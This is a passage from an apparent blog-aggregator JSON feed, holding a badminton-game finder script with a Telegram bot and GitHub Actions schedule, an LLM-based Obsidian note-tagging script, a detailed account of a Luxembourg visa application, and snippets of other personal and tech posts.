console.print(f\"[bold red]Error sending to Telegram:[\u002Fbold red] {e}\")\n\n    except requests.RequestException as e:\n        console.print(f\"[bold red]Error:[\u002Fbold red] Failed to connect to Playo API: {e}\")\n    except json.JSONDecodeError:\n        console.print(\"[bold red]Error:[\u002Fbold red] Failed to parse API response\")\n    except Exception as e:\n        console.print(f\"[bold red]Error:[\u002Fbold red] An unexpected error occurred: {e}\")\n\ndef send_to_telegram(games, token, chat_id):\n    \"\"\"Send game information to Telegram as a nicely formatted message.\"\"\"\n    if not games:\n        return\n\n    # Create a formatted message for Telegram\n    message = \"🏸 *Available Badminton Games* 🏸\\n\\n\"\n\n    for i, game in enumerate(games, 1):\n        message += f\"*{i}. {game['venue_name']}*\\n\"\n        message += f\"⏰ {game['start']} - {game['end']}\\n\"\n        message += f\"👥 Players: {game['players']}\\n\"\n        message += f\"👤 Host: {game['host']}\\n\"\n        message += f\"🎯 Skill: {game['skill']}\\n\"\n        message += f\"🔗 [Join Game](https:\u002F\u002Fplayo.co\u002Fmatch\u002F{game['id']})\\n\\n\"\n\n    # Send the message\n    asyncio.run(send_telegram_message(message, token, chat_id))\n\nasync def send_telegram_message(message, token, chat_id):\n    \"\"\"Send a message to Telegram using the Bot API.\"\"\"\n    bot = Bot(token=token)\n    await bot.send_message(\n        chat_id=chat_id,\n        text=message,\n        parse_mode=ParseMode.MARKDOWN,\n        disable_web_page_preview=False\n    )\n\n\nif __name__ == \"__main__\":\n    find_games()\nThe script outputs a beautiful output:\n\nTelegram:\n\nScheduling#\nI wanted this script to run reliably every day and used GitHub Actions for that.\nGitHub Actions felt like the path of least resistance as I didn’t have to worry about keeping a server running or getting alerts if something crashed. For a small personal script like this, it was the perfect “set it and forget it” solution.\nname: Badminton Game Checker Base\non:\n  schedule:\n    # Run Monday to Friday at 12:00 PM IST (6:30 AM UTC)\n    - cron: \"30 6 * * 1-5\"\n\njobs:\n  check-games:\n    runs-on: ubuntu-latest\n\n    env:\n      TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}\n      TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}\n      LATITUDE: ${{ inputs.latitude }}\n      LONGITUDE: ${{ inputs.longitude }}\n      RADIUS: ${{ inputs.radius }}\n      SPORT_ID: ${{ inputs.sport_id }}\n      TIMEZONE: ${{ inputs.timezone }}\n      START_TIME: ${{ inputs.start_time }}\n      END_TIME: ${{ inputs.end_time }}\n\n    steps:\n      - name: Checkout code\n        uses: actions\u002Fcheckout@v4\n\n      - name: Set up Python\n        uses: actions\u002Fsetup-python@v5\n        with:\n          python-version: \"3.12\"\n          cache: \"pip\"\n\n      - name: Install dependencies\n        run: |\n          python -m pip install --upgrade pip\n          pip install uv\n\n      - name: Run game check\n        run: |\n          echo \"Checking for games from $START_TIME to $END_TIME\"\n          uv run finder.py \\\n            --lat \"$LATITUDE\" \\\n            --lng \"$LONGITUDE\" \\\n            --radius \"$RADIUS\" \\\n            --sport \"$SPORT_ID\" \\\n            --timezone \"$TIMEZONE\" \\\n            --start-time \"$START_TIME\" \\\n            --end-time \"$END_TIME\" \\\n            --telegram\n        env:\n          TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}\n          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}\nI used GitHub Actions inputs to configure the variables for my script. Found this feature to be quite neat for scheduling different crons for weekday\u002Fweekends.\n\nSummary#\nFor small quality-of-life improvements - solving your own specific problems with custom scripts tailored exactly to your needs - gotta love the LLMs man. We’re gonna see more and more of such “personal tooling” in future as the entry to barrier for coding is lowered with LLMs. The democratization of coding through LLMs means people (even non-technical ones) can focus on “describing” the problem well, rather than struggling with implementation details. Being able to articulate what you want clearly becomes the primary skill - yes, it’s a skill issue if you can’t prompt well, but it’s far more accessible than learning programming from scratch.\nFin!",[],{"slug":710,"title":711,"link":712,"pubDate":713,"contentSnippet":714,"tags":715,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"open-source-security","Open Source Security: The Good, The Bad, The Vulnerable","https:\u002F\u002Fwww.divyamohan.com\u002Fopen-source-security\u002F","Fri, 28 Feb 2025 04:51:07 GMT","Open source is the backbone of nearly every application in every industry! As great as this may seem for the movement, it raises important questions about our progress. This panel discussion at the State of Open Conference 2025 explores some of these q's and discusses future implications.",[701,700,699],{"slug":717,"title":718,"link":719,"pubDate":720,"contentSnippet":721,"tags":722,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-7","Becoming a software A-Team via writing culture","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwriting-practices-to-10x-engineering\u002Findex.html","Fri, 28 Feb 2025 00:00:00 +0000","Strong writing culture transforms merely competent software teams into elite ones; those proverbial 10x product builders. Although creating high-leverage  writing culture requries mindful effort, it is not rocket science and one can start small. So... why, when, and how to do it? Personal opinions ahead. Take what is useful, discard the rest.",[55,54,457,243,723,53,246,227],"systems",{"slug":725,"title":726,"link":727,"pubDate":728,"contentSnippet":729,"tags":730,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-8","Systematically Terraforming a Brownfield of Cloud Infrastructure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsystems-approach-to-infrastructure-as-code\u002Findex.html","Tue, 18 Feb 2025 00:00:00 +0000","Some thinking, trade-offs, theory building, and method-making one might ended up doing, in the course of bringing Infrastructure as Code (IaC) discipline to brownfield (and greenfield) services, at a small regulated fintech company, having a smaller engineering team that serves several business units, including one of India's largest national tax gateways. Only somewhat easier than reading a long compound sentence without pausing for breath. Phew.",[457,723,731,732,530],"infrastructure","devops",{"slug":734,"title":735,"link":736,"pubDate":737,"contentSnippet":738,"tags":739,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"deepseek-ai-sovereignty-india","DeepSeek, AI sovereignty, and India","https:\u002F\u002Fnadh.in\u002Fblog\u002Fdeepseek-ai-sovereignty-india\u002F","Wed, 29 Jan 2025 00:00:00 +0000","Along came DeepSeek-R1[1] last week, an open-source large language model (LLM) reportedly rivaling OpenAI’s top offerings, sending shockwaves through the industry and generating much excitement in the tech world. It apparently started as a side project at a Chinese hedge fund before being spun out. Its efficacy, combined with claims of being built at a fraction of the cost and hardware requirements, has seriously challenged BigAI’s notion that “foundation models” demand astronomical investments. I have personally been playing around with R1 and have found it to be excellent at writing code. Speaking of foundation models, one rarely hears that term anymore; unsurprising, given that foundation is now commodity. Building a foundation-level LLM was once touted as the cornerstone of AI sovereignty, but that rhetoric has also waned. Much has changed regarding the idea of AI sovereignty.",[],{"slug":741,"title":742,"link":743,"pubDate":744,"contentSnippet":745,"tags":746,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"deepseek-r1","DeepSeek R1: Revolutionizing AI with Open Source and  DeepThinking","https:\u002F\u002Fibcomputing.com\u002Fdeepseek-r1\u002F","Wed, 22 Jan 2025 17:28:59 +0000","Artificial intelligence continues to evolve at a rapid pace, and DeepSeek R1 is at the forefront of this transformation. Building on the success of DeepSeek … \nThe post DeepSeek R1: Revolutionizing AI with Open Source and  DeepThinking appeared first on IB Computing.",[747,13,748],"AI","artificial intelligence",{"slug":750,"title":751,"link":752,"pubDate":753,"contentSnippet":754,"tags":755,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"luxembourg-visa-process","The Arduous Luxembourg Visa Process","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fluxembourg-visa-process\u002F","Tue, 21 Jan 2025 16:15:57 +0530","In 2024, I was sponsored by The Document Foundation (TDF) to attend the LibreOffice annual conference in Luxembourg from the 10th to the 12th of October. Being an Indian passport holder, I needed a visa to visit Luxembourg. However, due to my Kenya trip coming up in September, I ran into a dilemma: whether to apply before or after the Kenya trip.\nTo obtain a visa, I needed to submit my application with VFS Global (and not with the Luxembourg embassy directly). Therefore, I checked the VFS website for information on processing time, which says:\nAs a rule, the processing time of an admissible Schengen visa application should not exceed 15 calendar days (from the date the application is received at the Embassy).\nIt also mentions:\nIf the application is received less than 15 calendar days before the intended travel date, the Embassy can deem your application inadmissible. If so, your visa application will not be processed by the Embassy and the application will be sent back to VFS along with the passport.\nIf I applied for the Luxembourg visa before my trip, I would run the risk of not getting my passport back in time, and therefore missing my Kenya flight. On the other hand, if I waited until after returning from Kenya, I would run afoul of the aforementioned 15 working days needed by the embassy to process my application.\nI had previously applied for a Schengen visa for Austria, which was completed in 7 working days. My friends who had been to France told me they got their visa decision within a week. So, I compared Luxembourg’s application numbers with those of other Schengen countries. In 2023, Luxembourg received 3,090 applications from India, while Austria received 39,558, Italy received 52,332 and France received 176,237. Since Luxembourg receives a far fewer number of applications, I expected the process to be quick.\nTherefore, I submitted my visa application with VFS Global in Delhi on the 5th of August, giving the embassy a month with 18 working days before my Kenya trip. However, I didn’t mention my Kenya trip in the Luxembourg visa application.\nFor reference, here is a list of documents I submitted:\nPassport\nPhotocopy of passport data pages\nVisa application form\nOne photograph\nVisa appointment confirmation\nCover letter\nReturn flight reservations\nHotel bookings\nInvitation letter from the conference organizer, TDF\nConfirmation from The Luxembourg Convention Bureau G.I.E - the venue\nLast three months bank account statement with bank seal\nTravel insurance\nIncome Tax Return Statement\nMonthly payslips for the last three months\nI submitted ‘flight reservations’ instead of ‘flight tickets’. It is because, in case of visa rejection, I would have lost a significant amount of money if I booked confirmed flight tickets. The embassy also recommends the same. After the submission of documents, my fingerprints were taken.\nThe expenses for the visa application were as follows:\nService Description\nAmount (INR)\n\n\n\n\nVisa Fee\n8,114\n\n\nVFS Global Fee\n1,763\n\n\nCourier\n800\n\n\nTotal\n10,677\n\n\n\nGoing by the email notifications I received from VFS, my application reached the Luxembourg embassy the next day. Fast-forward to the 27th of August — 14th day of my visa application. I had already booked my flight ticket to Nairobi for the 4th of September, but my passport was still with the Luxembourg embassy, and I hadn’t heard back. In addition, I also obtained Kenya’s eTA and got vaccinated for Yellow Fever, a requirement to travel to Kenya.\nIn order to check on my application status, I gave the embassy a phone call, but missed their calling window, which was easy to miss since it was only 1 hour - 12:00 to 1:00 PM. So, I dropped them an email explaining my situation. At this point, I was already wondering whether to cancel the Kenya trip or the Luxembourg one, if I had to choose.\nAfter not getting a response to my email, I called them again the next day. The embassy told me they would look into it and asked me to send my flight tickets over email. One week to go before my flight now.\nI followed up with the embassy on the 30th by a phone call, and the person who picked up the call told me that my request had already been forwarded to the concerned department and is under process. They asked me to follow up on Monday, 2nd September.\nDuring the visa process, I was in touch with three other Indian attendees.1 In the meantime, I got to know that all of them had applied for a Luxembourg visa by the end of the month of August.\nBack to our story, over the next two days, the embassy closed for the weekend. I began weighing my options. On one hand, I could cancel the Kenya trip and hope that Luxembourg goes through. Even then, Luxembourg wasn’t guaranteed as the visa could get rejected, so I might have ended up missing both the trips. On the other hand, I could cancel the Luxembourg visa application and at least be sure of going to Kenya. However, I thought it would make Luxembourg very unlikely because it didn’t leave 15 working days for the embassy to process my visa after returning from Kenya. I also badly wanted to attend the LibreOffice conference because I couldn’t make it two years ago. Therefore, I chose not to cancel my Luxembourg visa application. I checked with my travel agent and learned that I could cancel my Nairobi flight before September 4th for a cancelation fee of approximately 7,000 INR.\nOn the 2nd of September, I was a bit frustrated because I hadn’t heard anything from the embassy regarding my request. Therefore, I called the embassy again. They assured me that they would arrange a call for me from the concerned department that day, which I did receive later that evening. During the call, they offered to return my passport via VFS the next day and asked me to resubmit it after returning from Kenya. I immediately accepted the offer and was overjoyed, as it would enable me to take my flight to Nairobi without canceling my Luxembourg visa application. However, I didn’t have the offer in writing, so it wasn’t clear to me how I would collect my passport from VFS. The next day, I would receive it when I would be on my way to VFS in the form of an email from the embassy which read:\nDear Mr. Dwivedi,\nWe acknowledge the receipt of your email.\nAs you requested, we are returning your passport exceptionally through VFS, you can collect it directly from VFS Delhi Center between 14:00-17:00 hrs, 03 Sep 2024. Kindly bring the printout of this email along with your VFS deposit receipt and Original ID proof.\nOnce you are back from your trip, you can redeposit the passport with VFS Luxembourg for our processing.\nWith best regards,\nGRAND DUCHY OF LUXEMBOURG\nI took a printout of the email and submitted it to VFS to get my passport. This seemed like a miracle - just when I lost all hope of making it to my Kenya flight and was mentally preparing myself to miss it, I got my passport back “exceptionally” and now I had to mentally prepare again for Kenya. I had never heard of an embassy returning passport before completing the visa process before. The next day, I took my flight to Nairobi as planned. In case you are interested, I have written two blog posts on my Kenya trip - one on the OpenStreetMap conference in Nairobi and the other on my travel experience in Kenya.\nAfter returning from Kenya, I resubmitted my passport on the 17th of September. Fast-forward to the 25th of September; I didn’t hear anything from the embassy about my application process. So, I checked with TDF to see whether the embassy reached out to them. They told me they confirmed my participation and my hotel booking to the visa authorities on the 19th of September (6 days ago). I was wondering what was taking so long after the verification.\nOn the 1st of October, I received a phone call from the Luxembourg embassy, which turned out to be a surprise interview. They asked me about my work, my income, how I came to know about the conference, whether I had been to Europe before, etc. The call lasted around 10 minutes. At this point, my travel date - 8th of October - was just two working days away as the 2nd of October was off due to Gandhi Jayanti and 5th and 6th October were weekends, leaving only the 3rd and the 4th. I am not sure why the embassy saved this for the last moment, even though I submitted my application 2 months ago. I also got to know that one of the other Indian attendees missed the call due to being in their college lab, where he was not allowed to take phone calls. Therefore, I recommend that the embassy agree on a time slot for the interview call beforehand.\nVisa decisions for all the above-mentioned Indian attendees were sent by the embassy on the 4th of October, and I received mine on the 5th. For my travel date of 8th October, this was literally the last moment the embassy could send my visa. The parcel contained my passport and a letter. The visa was attached to a page in the passport. I was happy that my visa had been approved. However, the timing made my task challenging. The enclosed letter stated:\nSubject: Your Visa Application for Luxembourg\nDear Applicant,\nWe would like to inform you that a Schengen visa has been granted for the 8-day duration from 08\u002F10\u002F2024 to 30\u002F10\u002F2024 for conference purposes in Luxembourg.\nYou are requested to report back to the Embassy of Luxembourg in New Delhi through an email (email address redacted) after your return with the following documents:\nImmigration Stamps (Entry and Exit of Schengen Area)\nRestaurant Bills\nShopping\u002FHotel\u002FAccommodation bills\nFailure to report to the Embassy after your return will be taken into consideration for any further visa applications.\nI understand the embassy wanting to ensure my entry and exit from the Schengen area during the visa validity period, but found the demand for sending shopping bills excessive. Further, not everyone was as lucky as I was as it took a couple of days for one of the Indian attendees to receive their visa, delaying their plan. Another attendee had to send their father to the VFS center to collect their visa in time, rather than wait for the courier to arrive at their home.\nForeign travel is complicated, especially for the citizens of countries whose passports and currencies are weak. Embassies issuing visas a day before the travel date doesn’t help. For starters, a last-minute visa does not give enough time for obtaining a forex card as banks ask for the visa. Further, getting foreign currency (Euros in our case) in cash with a good exchange rate becomes difficult. As an example, for the Kenya trip, I had to get US Dollars at the airport due to the plan being finalized at the last moment, worsening the exchange rate. Back to the current case, the flight prices went up significantly compared to September, almost doubling. The choice of airlines also got narrowed, as most of the flights got booked by the time I received my visa. With all that said, I think it was still better than an arbitrary rejection.\nCredits: Contrapunctus, Badri, Fletcher, Benson, and Anirudh for helping with the draft of this post.\nThanks to Sophie, our point of contact for the conference, for putting me in touch with them. ↩︎",[],{"slug":757,"title":758,"link":759,"pubDate":760,"contentSnippet":761,"tags":762,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"the-feeling-of-thoughts","The feeling of thoughts","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthe-feeling-of-thoughts\u002F","Mon, 20 Jan 2025 16:25:36 +0000","When I look at an object, like the cup on the table next to my laptop right now, the visual feel of the object is entirely driven by the physical object itself. In this case, I am not imagining or making up the visual feel of the cup. It looks the way the cup intends […]",[148,149],{"slug":764,"title":765,"link":766,"pubDate":767,"contentSnippet":768,"tags":769,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"cleanup-obsidian","Cleaning up Notes with LLM","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fcleanup-obsidian\u002F","2025-01-03T04:45:00.000Z","My Obsidian vault has gotten quite messy over time. I’ve been dumping notes without proper frontmatter, tags were all over the place, and some notes didn’t even have proper titles! I needed a way to clean this up without spending hours manually organizing everything.\nI’d been playing around with Claude’s API lately, and thought – hey, why not use an LLM to analyze my notes and add proper frontmatter? After all, that’s what these AI models are good at – understanding context and categorizing stuff.\nI wrote a small Python script using the llm library (which is pretty neat btw) to do just this. Here’s what it looks like:\nimport llm\nimport os\nimport yaml\nimport datetime\nfrom pathlib import Path\nimport re\n\nclass ObsidianNoteProcessor:\n    def __init__(self, notes_dir, model_name=\"claude-3.5-sonnet\"):\n        self.notes_dir = Path(notes_dir)\n        self.model = llm.get_model(model_name)\n        \n    def extract_existing_frontmatter(self, content):\n        \"\"\"Extract existing frontmatter if present.\"\"\"\n        frontmatter_pattern = r'^---\\n(.*?)\\n---\\n'\n        match = re.match(frontmatter_pattern, content, re.DOTALL)\n        \n        if match:\n            try:\n                return yaml.safe_load(match.group(1)), content[match.end():]\n            except yaml.YAMLError:\n                return {}, content\n        return {}, content\n\n    def generate_prompt(self, content):\n        \"\"\"Generate a prompt for the LLM to analyze the note content.\"\"\"\n        return f\"\"\"Analyze the following note content and extract\u002Finfer the following properties:\n1. A clear title (if not present, generate from content)\n2. Relevant categories based on the content\n3. Appropriate tags (include 'inbox' if content seems draft-like)\n4. Status (Draft\u002FIn Progress\u002FComplete) based on content completeness\n5. Priority (Low\u002FMedium\u002FHigh) based on content importance\n6. A brief description summarizing the content\n\nNote content:\n{content}\n\nReturn ONLY the YAML frontmatter without any code block markers. Use this exact format (omit fields if not applicable):\ntitle: \u003Ctitle>\ncategory: \u003Ccategory>\ntags:\n  - tag1\n  - tag2\nstatus: \u003Cstatus>\npriority: \u003Cpriority>\ndescription: \u003Cdescription>\"\"\"\n\n    def clean_llm_response(self, response_text):\n        \"\"\"Clean up the LLM response to ensure proper YAML.\"\"\"\n        # Remove yaml code block markers if present\n        response_text = response_text.strip()\n        if response_text.startswith('```yaml'):\n            response_text = response_text.split('\\n', 1)[1]\n        if response_text.endswith('```'):\n            response_text = response_text.rsplit('\\n', 1)[0]\n        return response_text.strip()\n\n    def process_note(self, file_path):\n        \"\"\"Process a single note file.\"\"\"\n        try:\n            with open(file_path, 'r', encoding='utf-8') as f:\n                content = f.read()\n            \n            # Extract existing frontmatter and content\n            existing_frontmatter, main_content = self.extract_existing_frontmatter(content)\n            \n            # Generate and execute prompt\n            response = self.model.prompt(self.generate_prompt(main_content))\n            response_text = self.clean_llm_response(response.text())\n            \n            try:\n                new_frontmatter = yaml.safe_load(response_text)\n                if not isinstance(new_frontmatter, dict):\n                    print(f\"Warning: Invalid response format for {file_path.name}\")\n                    new_frontmatter = {}\n            except yaml.YAMLError as e:\n                print(f\"YAML parsing error for {file_path.name}\")\n                print(f\"Response text was:\\n{response_text}\")\n                raise e\n            \n            # Merge with existing frontmatter, preferring existing values\n            merged_frontmatter = {**new_frontmatter, **existing_frontmatter}\n            \n            # Add date if not present\n            if 'date' not in merged_frontmatter:\n                merged_frontmatter['date'] = datetime.date.today().isoformat()\n            \n            # Generate new note content\n            new_content = \"---\\n\"\n            new_content += yaml.dump(merged_frontmatter, sort_keys=False, allow_unicode=True)\n            new_content += \"---\\n\\n\"\n            new_content += main_content.strip()\n            \n            # Write back to file\n            with open(file_path, 'w', encoding='utf-8') as f:\n                f.write(new_content)\n                \n            print(f\"✓ Processed: {file_path.name}\")\n            \n        except Exception as e:\n            print(f\"✗ Error processing {file_path.name}: {str(e)}\")\n\n    def process_vault(self):\n        \"\"\"Process all markdown files in the vault.\"\"\"\n        print(\"Starting Obsidian vault cleanup...\")\n        \n        for file_path in self.notes_dir.glob('**\u002F*.md'):\n            self.process_note(file_path)\n        \n        print(\"\\nVault cleanup completed!\")\n\ndef main():\n    # Set up the model key if not already configured\n    model = llm.get_model(\"claude-3.5-sonnet\")\n    if not hasattr(model, 'key'):\n        api_key = os.getenv('ANTHROPIC_API_KEY')\n        if not api_key:\n            raise ValueError(\"Please set ANTHROPIC_API_KEY environment variable\")\n        model.key = api_key\n    \n    # Initialize and run the processor\n    notes_dir = \"\u002FUsers\u002Fkaran\u002FNotes\u002FObsidian\u002FThe Wall\u002FNotes\"\n    processor = ObsidianNoteProcessor(notes_dir)\n    processor.process_vault()\n\nif __name__ == \"__main__\":\n    main()\n\nThe script is pretty straightforward – it reads each markdown file, extracts any existing frontmatter (because I don’t want to lose that!), and then asks Claude to analyze the content and generate appropriate frontmatter. It adds stuff like title, category, tags, status, priority.\nWhat I love about this approach is that it’s contextual. Unlike regex-based approaches or keyword matching, the LLM actually understands what the note is about and can categorize it properly. A note about “Setting up BTRFS on Arch” automatically gets tagged with “linux”, “filesystem”, “arch” without me having to maintain a predefined list of tags. The categorization is probably better than what I’d have done manually at 2 AM while organizing my notes!\nFin!",[],{"slug":771,"title":772,"link":773,"pubDate":774,"contentSnippet":775,"tags":776,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-9","Here's to Quarter Two of the 21st century","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhello-quarter-two-of-the-21st-century\u002Findex.html","Wed, 01 Jan 2025 00:00:00 +0000","The first quarter elapsed. Much happened. Much didn’t. We-who-are-reading-this-right-now are perhaps a bit bruised, disheveled, a little worse for the wear, and horribly hung over. But alive. Except you, Mx. LLM. Who knows what’s next?",[55,49],{"slug":778,"title":779,"link":780,"pubDate":781,"contentSnippet":782,"tags":783,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"tholkappiyam-discussion","tholkappiyam discussion","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F12\u002F23\u002Ftholkappiyam-discussion\u002F","Mon, 23 Dec 2024 17:19:27 +0000","Discussion – Dec 23, 2024Date and Time Dec 7, 2024 20:30-22:00 ISTMembers Joined Topics discussed Cosmetics: Where to maintain the code base ? Contribution Related: Language to be maintained in the code ? TBD Codebase: -> check point => Jan 20th.",[224],{"slug":785,"title":786,"link":787,"pubDate":788,"contentSnippet":789,"tags":790,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"2024","2024: A Year In Review","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002F2024\u002F","2024-12-23T06:30:00.000Z","2024 was indeed an important year for me as it marked several significant milestones. Quite happy with how this year was! Here’s\nmy reflection on this memorable year.\nLife#\nGot married to the prettiest and dearest Saumya 💗\nDid my first international trip, exploring Europe\nBought a fun toy - Maruti Jimny 4x4\nRelocated to Bangalore after working from home for 4+ years since Covid\nAttended several amazing concerts:\n\nIndian Ocean\nParvaaz\nBlackstratblues\nAnand Bhaskar Collective\nBandland\nTravel#\nSwitzerland\nItaly\nAustria\nBinsar\nCochin\nAjmer\nRanthambore\nPondicherry\nChennai\nProjects#\nReleased v1.0.0 of Doggo - It hit frontpage of HN as well!\nBuilt an expense tracker app - Gullak\nMade a lot of small utility apps:\n\nlil - URL shortener\nsilencer - Prometheus alerts \u003C> Mattermost bridge\ntoru - Go modules proxy with caching\njunbi - Server Setup and Hardening Tool\nOvenly Delights - Small bakery shop website\nnomcfg - Nomad config generator\nclx - Generate CLI commands using AI for common ops\nStarted working on a log analytics app - full focus on that in 2025. Read more\nThis year has been truly transformative, bringing together personal joy, professional growth, and exciting adventures. Looking forward to what 2025 has in store!",[],{"slug":792,"title":793,"link":794,"pubDate":795,"contentSnippet":796,"tags":797,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"donate","Donate","https:\u002F\u002Fshrirangkahale.com\u002Fdonate\u002F","Fri, 13 Dec 2024 00:00:00 +0000","I run a non-profit FOSS mirror service which serves thousands of people daily.\nIndia is a vast country, and with increasing popularity of FOSS more and more mirrors are needed, when compared to other countries we have very few mirrors. We are working to improve the situation.\nCurrently we have a mirror node in three cities in India. Nagpur, Mumbai and Chennai. We are working on deploying another mirror node in Hyderabad.",[],{"slug":799,"title":800,"link":801,"pubDate":802,"contentSnippet":803,"tags":804,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"kanchilug-engine-mode","Kanchi-LUG : புதிய பயணம், புதிய பாதையில்","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F12\u002F03\u002Fkanchilug-engine-mode\u002F","Tue, 03 Dec 2024 18:29:55 +0000","டிச, 3 2024 காஞ்சிபுரம் லினக்ஸ் பயனர் குழுவின் ஒருங்கிணைப்பாளர் பொறுப்பிலிருந்து விடுபடுவதாக திரு. பரமேஸ்வர் அருணாச்சலம் அவர்கள் வாராந்திர கூட்டத்திலும் ,மடல் பட்டியலிலும் அறிவித்திருந்தார். நான் காஞ்சி லினக்ஸ் பயனர் குழுவில் இணைந்ததில் இருந்து பரமேஸ்வர் அவர்கள் சிறப்பாக வாராந்திர மற்றும் மாதாந்திர கூட்டத்தினை நடத்திவந்தார். வரும் வாரங்களில் அவரைப் போலவே சிறப்பாக வாரந்திர மற்றும் மாதாந்திர கூட்டங்களை நடத்தும் ஒருங்கிணைப்பாளராக நான் பொறுபேற்றுக்கொள்ள இருக்கிறேன். சில பொறுப்புகளை ஏற்று நடத்துதலில் நல்ல நிர்வாக திறனை […]",[224],{"slug":806,"title":807,"link":808,"pubDate":809,"contentSnippet":810,"tags":811,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"curlftpfs-a-glance","curlftpfs – ஒரு பார்வை","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F12\u002F01\u002Fcurlftpfs-a-glance\u002F","Sun, 01 Dec 2024 11:33:37 +0000","CurlFtpFS – A FTP filesystem based on cURL and FUSE ஆக என்ன பயன்? ஒரு ftp தளத்திலிருந்து கோப்பு மேலாளர்(nautilus,nemo…etc) மூலமாகவே ஒரு தளத்தினை வன்வட்டில் உள்ளது போலவே அணுக இயலும். எவ்வாறு நிறுவுவது? எனும் கட்டளையை இயக்கி நிறுவலாம். எவ்வாறு பயன்படுத்துவது? முதலில் நமது கோப்பு அமைப்பில் நாம் பயன்படுத்தபோகிற ftp தளத்திற்கு ஒரு கோப்புறை உருவாக்குக (கோப்புறைக்கு 777 அனுமதி வழங்கு). பின்னர் பின்வரும் கட்டளைகளில் எதாவது ஒன்றை இயக்கி […]",[224],{"slug":813,"title":814,"link":815,"pubDate":816,"contentSnippet":817,"tags":818,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"how-to-create-publish-a-php-package-with-composer-e0-ae-a4-e0-ae-ae-e0-ae-bf-e0-ae-b4-e0-ae-bf-e0-ae","How to Create & Publish a PHP Package with Composer? – தமிழில்","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F11\u002F08\u002Fhow-to-create-publish-a-php-package-with-composer-%e0%ae%a4%e0%ae%ae%e0%ae%bf%e0%ae%b4%e0%ae%bf%e0%ae%b2%e0%af%8d\u002F","Fri, 08 Nov 2024 17:59:26 +0000","அக், 13 2024 பிஹெச்பி பொதிகளை பிஹெச்பி கம்போசர்-உடன் உருவாக்க மற்றும் வெளியிடுவது ஒரு நேரடியான வழிமுறை இந்த வழிமுறையை பின்பற்றினால் நாம் எளிமையாக பிஹெச்பி சமூகத்துடன் நமது நிரல்களை பொதிவடிவத்தில் பகிர்ந்துகொள்ளலாம். கம்போசர் – (பிஹெச்பி சார்புகளின் நிர்வாகி) – PHP Dependency Manager தேவையானவை: உங்களது கணினியில் பின்வருவற்றை நிறுவி இருப்பது அவசியம். படிகள்: படி 1: நம்முடைய பொதிக்கான ஒரு கோப்புறையை உருவாக்கி கொள்ளவும். படி 2: கம்போசர் பொதியை துவக்குதல் நம் […]",[224,819,820,821],"composer","kaniyam","tamil",{"slug":823,"title":824,"link":825,"pubDate":826,"contentSnippet":827,"tags":828,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kenya-trip","Asante Kenya for a Good Time","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkenya-trip\u002F","Tue, 05 Nov 2024 00:55:21 +0530","In September of this year, I visited Kenya to attend the State of the Map conference. I spent six nights in the capital Nairobi, two nights in Mombasa, and one night on a train. I was very happy with the visa process being smooth and quick. During the conference, I stayed at the Nairobi Transit Hotel with other attendees, with Ibtehal from Bangladesh as my roommate. I found it interesting that the shops around the hotel were grated, presumably to protect against robberies. The hotel guard had to open the lock of the hotel for us to go out at night. Further, I noticed that the banks had three layers of security. Despite this, Ibtehal and I used to hangout at a coffee shop during midnight.\n\n      \nThe coffee shop Ibtehal and me used to visit during the midnight\n\n      \nGrating at a chemist shop in Mombasa, Kenya\nThe country lies on the equator, which might give the impression of extremely hot temperatures. However, Nairobi was on the cooler side (10–25 degrees Celsius), and I found myself needing a hoodie, which I bought the next day. It also served as a nice souvenir, as it had an outline of the African map printed on it.\nI also bought a Safaricom SIM card for 100 shillings and recharged it with 1000 shillings for 8 GB internet with 5G speeds and 400 minutes talk time.\nA visit to Nairobi’s Historic Cricket Ground\nOn this trip, I got a unique souvenir that can’t be purchased from the market—a cricket jersey worn in an ODI match by a player. The story goes as follows: I was roaming around the market with my friend Benson from Nairobi to buy a Kenyan cricket jersey for myself, but we couldn’t find any. So, Benson had the idea of visiting the Nairobi Gymkhana Club, which used to be Kenya’s main cricket ground. It has hosted some historic matches, including the 2003 World Cup match in which Kenya beat the mighty Sri Lankans and the record for the fastest ODI century by Shahid Afridi in just 37 balls in 1996.\nAlthough entry to the club was exclusively for members, I was warmly welcomed by the staff. Upon reaching the cricket ground, I met some Indian players who played in Kenyan leagues, as well as Lucas Oluoch and Dominic Wesonga, who have represented Kenya in ODIs. When I expressed interest in getting a jersey, 